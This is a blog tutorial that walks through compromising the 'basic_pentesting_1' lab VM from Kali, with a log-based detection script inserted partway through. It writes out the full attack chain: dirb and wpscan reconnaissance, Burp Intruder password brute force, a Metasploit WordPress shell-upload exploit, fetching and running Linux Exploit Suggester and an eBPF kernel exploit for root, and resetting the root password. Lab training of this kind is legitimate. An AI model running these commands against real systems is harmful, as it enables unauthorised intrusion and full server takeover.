In this blog, we will download, run, and attack a vulnerable Linux OS using some of the tools built into Kali. We will also install a new tool (LES) and use it to learn about potential vulnerabilities in that vulnerable OS. A walkthrough with instructions is also provided in my YouTube video, which you can watch at the end of the blog.

READINGS & TOOLS

SETUP

This VM (basic_pentesting_1.ova) [Link] is released in .ova format, tested with VirtualBox, and can be imported into VMware Workstation with no problems. To import this VM into VMware, right-click on the sidebar and click Open, navigate to the folder where the VM file was downloaded, and select it. VMware will automatically start the import, and you will get an error saying that the file did not pass the virtual hardware compliance checks. Just click the “Retry” button to ignore this check.

Once the VM is booted, change the network adapter to “NAT”: right-click on the VM name -> Settings -> Network Adapter -> click NAT -> Save.

We also need a Kali Linux VM for attacking purposes. Go to https://www.kali.org/get-kali/#kali-virtual-machines -> download the VMware VM for Kali. The username and password for that VM are both “kali”.

EXPLORING WEBSITES WITH DIRB

For now, we don’t know anything about the server. We don’t even know whether any website is hosted on it. So to scan for websites on the server, log into the Kali machine and open a terminal. Here “dirb” will be used to scan for websites on the server.

“dirb” is a tool included with Kali that performs brute-force URL scanning based on pre-assembled wordlists. You can read more about this tool here: https://tools.kali.org/web-applications/dirb

To use “dirb”, we need to know the IP address of the machine. Both machines, attacker and server, are connected using NAT, and VMware assigns IP addresses so that both are in the same network. We can find all machines in a network using another tool called “nmap”, which checks which IP addresses are alive. So to use “nmap” we first need the network address of the Kali machine, which we can get by running the following command.

ip addr
Figure 1: Find IP Address

In my case, the IP address of the Kali machine is 192.168.219.130/24. To find the IP address of the server, run the following command.

nmap 192.168.219.130/24

The above command iterates over every IP address in the network and checks whether it is alive. We need to find the entry where HTTP is enabled.

In my case that IP address is 192.168.219.135. Copy that IP address and paste it into the browser; you should see a website. If it works, copy the link to the page and run the following command with your link.

dirb http://192.168.219.135

Once the scan started by the above command is complete, you should see information about the server like the image below.

Figure 2: Dirb Command

If we analyze the links “dirb” has found for us, we can see that they look like the links of a WordPress website. The link we are interested in is http://192.168.219.135/secret/. Copy this link and paste it into the browser; this will open a blogging website.

Figure 3: Website

ATTACKING WORDPRESS

By looking at the dirb results you can see a link like <SERVER IP Address>/secret/wp-admin. If you go to this link you will find the login page for the blogging website. You can try different usernames and passwords.

WordPress has a long history of server-compromising vulnerabilities. You can see the list of those vulnerabilities at this link.
It has such a bad reputation that a tool, wpscan, was created explicitly to scan running servers for its vulnerabilities.

FIND USERNAME

We will use wpscan to find the username of the WordPress website. Run the following command to do that:

wpscan --url http://192.168.219.135/secret/ --enumerate u

Analyze the output of the above command and you will find a line that says “User(s) Identified:”. After this line you will see a username. You can see in the image below that this username is “admin”.

Figure 4: wpscan output

Go back to the browser where the login page of this website is open and try to log in with this username. You will notice that the login error message changes, and this new error message confirms that the username is correct but the password is not.

FIND PASSWORD

To find the password of this website we will use another tool called Burp Suite. Open Burp Suite -> go with a temporary project and click Next -> go with the defaults and click “Start Burp” -> go to the Proxy tab -> click “Intercept is on” -> click “Open Browser”.

In the newly opened browser, open the login page of the website. Once it is loaded, go back to Burp and click “Intercept is off”. Then go back to the browser and try to log in with the previously found username and a random password. Go back to Burp and you will see a result like the following image.

Figure 5: Proxy Tab

Right-click on this result -> Send to Repeater -> go to the Repeater tab. You will now see the request in the Repeater tab. You can change the password in the request by editing the value of the “pwd” argument and trying different passwords until you find the correct one. We will instead use an automated and more elegant method to find the password. To do that, right-click -> Send to Intruder -> go to the Intruder tab. You will see the following window.

Figure 6: Intruder Tab

Look at all the orange lines in the image. We will select every orange line except the one in front of “pwd=”. After selecting every orange line, click the Clear button. By doing so we are telling Burp to keep the values fixed in every other part of the form except the password.

Figure 7: Intruder Tab after the changes

Now go to the Payloads tab -> click the Load button under Payload Options -> go to /usr/share/wordlists and open the fasttrack.txt file. You should see the wordlist entries loaded.

Figure 8: Payload loading Page

Now click on the “Start attack” button. Once the process is complete, you should see that Burp has checked every password against the admin username. Sort the results by clicking on Status, and select the password whose status is 302. In my case, that password is also “admin”.

You can check this password in the browser.
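From the defender's side, the dirb run and the Intruder password run above both leave a distinctive trace in the web server's access log. The following Python script is an added example (not part of the original walkthrough or of any tool it uses) that flags both patterns over constructed combined-format log lines; the thresholds and the 10.0.0.x client addresses are assumptions.

```python
import re
from collections import defaultdict
# Apache/nginx "combined" format: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
# Thresholds are assumptions for this example; tune them to the site's normal traffic.
NOT_FOUND_THRESHOLD = 20  # 404s from one client, typical of a dirb wordlist run
LOGIN_THRESHOLD = 10      # POSTs to wp-login.php from one client

def detect(lines):
    """Return {client_ip: [findings]} for clients that scan paths or guess passwords."""
    not_found, login_posts, login_success = defaultdict(int), defaultdict(int), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, status = m["ip"], int(m["status"])
        if status == 404:
            not_found[ip] += 1
        if m["method"] == "POST" and m["path"].endswith("/wp-login.php"):
            login_posts[ip] += 1
            # A correct password gets a 302 redirect to wp-admin, a wrong one a 200
            # that re-renders the form, which is why Intruder is sorted by status.
            if status == 302:
                login_success.add(ip)
    findings = defaultdict(list)
    for ip, n in not_found.items():
        if n >= NOT_FOUND_THRESHOLD:
            findings[ip].append(f"directory brute force: {n} 404 responses")
    for ip, n in login_posts.items():
        if n >= LOGIN_THRESHOLD:
            outcome = "a 302 was returned (success)" if ip in login_success else "no success seen"
            findings[ip].append(f"wp-login.php password guessing: {n} POSTs, {outcome}")
    return dict(findings)

def _line(ip, method, path, status, sec):
    """Build one constructed combined-format log line (sample data, not real traffic)."""
    return f'{ip} - - [28/Jul/2022:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "-"'

# Constructed sample: a dirb-style run and a password run ending in a 302 from one
# client, plus an ordinary visitor that must not be flagged.
SAMPLE_LOG = (
    [_line("10.0.0.5", "GET", f"/secret/wordlist-entry-{i}", 404, i % 60) for i in range(25)]
    + [_line("10.0.0.5", "POST", "/secret/wp-login.php", 200, i % 60) for i in range(12)]
    + [_line("10.0.0.5", "POST", "/secret/wp-login.php", 302, 13)]
    + [_line("10.0.0.9", "GET", "/secret/", 200, 5), _line("10.0.0.9", "GET", "/favicon.ico", 404, 6)]
)

for client, notes in detect(SAMPLE_LOG).items():
    print(client, "->", "; ".join(notes))
```

Feeding a real access log is a matter of `detect(open(path))`; a single client producing a burst of 404s followed by repeated POSTs to wp-login.php that end in a 302 is the signature of exactly the steps shown above.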

ACCESS SERVER

Most hackers would stop here and change the content of the WordPress website. But we will go further and take over the server where WordPress is running, so we can do whatever we want whenever we want.

Go to the terminal and run the following commands:

msfconsole

search wordpress
use exploit/unix/webapp/wp_admin_shell_upload
show options
set PASSWORD admin
set USERNAME admin
set RHOSTS 192.168.219.135
set TARGETURI /secret
exploit

shell
whoami

Once you run the exploit command above, you get access to the server. The “shell” command opens a shell on the server, and when you run “whoami”, it shows the username you are running as on the server.

We can get a proper bash shell by running the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

Navigate to the /tmp directory using the following commands.

cd /tmp
ls -l

We will use Linux Exploit Suggester (Link). Run the following commands.

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

chmod +x les.sh
./les.sh

The first two commands download the “les.sh” file and make it executable. The third command runs the tool.

This will suggest a number of exploits that may apply. We will use the eBPF_verifier one. To use it, copy its download URL and run the following commands.

wget <copied download link>
mv 45010 45.c
gcc 45.c
./a.out

When we have run all the commands above, the exploit we downloaded gives us root access. You can verify this by running the “whoami” command. You can change the root password of the machine so you can ssh into it with that username and password. To do that, run the following command.

passwd root

VIDEO TUTORIAL

ABOUT ME

I’m Usama Imdad, a full-stack developer / AI engineer. I write technology-related blogs occasionally. I hope you enjoyed reading this article! If you liked the blog and learned anything new today, share this post with friends. If you have any questions or suggestions, drop a comment. I will try to answer your queries as soon as possible.

You can find more info about me on my website, LinkedIn or Twitter.


Last Update: July 28, 2022